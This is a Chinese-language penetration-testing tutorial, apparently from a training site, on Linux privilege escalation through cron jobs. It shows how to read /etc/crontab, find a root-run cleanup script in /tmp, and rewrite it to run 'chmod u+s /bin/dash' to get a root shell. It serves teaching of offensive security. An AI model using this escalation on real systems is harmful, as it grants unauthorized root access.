[原创]WEB安全第六章提权篇05 LINUX CRON JOBS 提权
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第六章提权篇05 LINUX CRON JOBS 提权
Cron Jobs 计划任务 通过 /etc/crontab 文件,可以设定系统定期执行的任务。
crontab 文件只能是root权限 进行编辑
我们得到一个非root权限的远程登录用户的时候
查看/etc/crontab 内容文件
发现存在
![[原创]WEB安全第六章提权篇05 LINUX CRON JOBS 提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
每两分钟执行一次文件
找到 /tmp/cleanup.py
![[原创]WEB安全第六章提权篇05 LINUX CRON JOBS 提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
cat /tmp/cleanup.py
#!/usr/bin/env python
import os
import sys
try:
os.system(‘rm -r /home/moonteam/cleanup/*’)
except:
sys.exit()
两分钟执行一次文件 删除cleanup目录下全部文件
![[原创]WEB安全第六章提权篇05 LINUX CRON JOBS 提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
查看权限
ls -al
修改内容
os.system(‘chmod u+s /bin/dash’)
![[原创]WEB安全第六章提权篇05 LINUX CRON JOBS 提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
把 /bin/dash设置SUID权限 运行之后就会得到 root权限
使用命令dash
![[原创]WEB安全第六章提权篇05 LINUX CRON JOBS 提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/407.html